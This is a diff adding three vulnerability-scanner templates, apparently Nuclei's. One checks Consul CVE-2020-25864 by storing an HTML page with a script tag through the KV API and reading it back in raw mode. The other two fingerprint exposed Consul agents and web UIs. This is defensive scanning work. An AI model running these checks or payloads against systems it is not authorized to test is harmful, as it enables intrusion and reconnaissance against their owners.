diff --git a/cves/2020/CVE-2020-25864.yaml b/cves/2020/CVE-2020-25864.yaml
new file mode 100644
index 0000000000..e5604bec51
--- /dev/null
+++ b/cves/2020/CVE-2020-25864.yaml
@@ -0,0 +1,39 @@
+id: CVE-2020-25864
+
+info:
+  name: HashiCorp Consul and Consul Enterprise up to version 1.9.4 key-value (KV) raw mode is vulnerable to cross-site scripting
+  severity: medium
+  author: c-sh0
+  reference:
+    - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-25864
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-25864
+    cwe-id: CWE-79
+  tags: cve,cve2020,consul,xss
+
+requests:
+  - raw:
+      - |
+        PUT {{BaseURL}}/v1/kv/{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+
+        <!DOCTYPE html><script>alert(document.domain)</script>
+
+      - |
+        GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body_2
+        words:
+          - "<!DOCTYPE html><script>alert(document.domain)</script>"
\ No newline at end of file
diff --git a/exposed-panels/hashicorp-consul-agent.yaml b/exposed-panels/hashicorp-consul-agent.yaml
new file mode 100644
index 0000000000..9864f3c349
--- /dev/null
+++ b/exposed-panels/hashicorp-consul-agent.yaml
@@ -0,0 +1,26 @@
+id: hashicorp-consul-agent
+
+info:
+  name: Hashicorp Consul Agent Detection
+  author: c-sh0
+  severity: info
+  description: Obtain Consul Version Information
+  tags: tech,consul,api
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/v1/agent/self"
+
+    matchers:
+      - type: word
+        words:
+          - '"Datacenter":'
+          - '"Revision":'
+          - '"PrimaryDatacenter"'
+        condition: and
+
+    extractors:
+      - type: json
+        json:
+          - " .Config.Version"
\ No newline at end of file
diff --git a/exposed-panels/hashicorp-consul-webgui.yaml b/exposed-panels/hashicorp-consul-webgui.yaml
new file mode 100644
index 0000000000..a157a7fed6
--- /dev/null
+++ b/exposed-panels/hashicorp-consul-webgui.yaml
@@ -0,0 +1,37 @@
+id: hashicorp-consul-webgui
+
+info:
+  name: HashiCorp Consul WebGUI Detection
+  author: c-sh0
+  description: Detection of HashiCorp Consul WebGUI
+  severity: info
+  metadata:
+    shodan-query: http.title:"Consul by HashiCorp"
+  tags: consul,webserver,panel
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ui/"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '<title>Consul by HashiCorp</title>'
+          - '%22%2C%22CONSUL_COPYRIGHT_URL%22%3A%22https%3A%2F%2Fwww.hashicorp.com%22'
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - "CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})"
\ No newline at end of file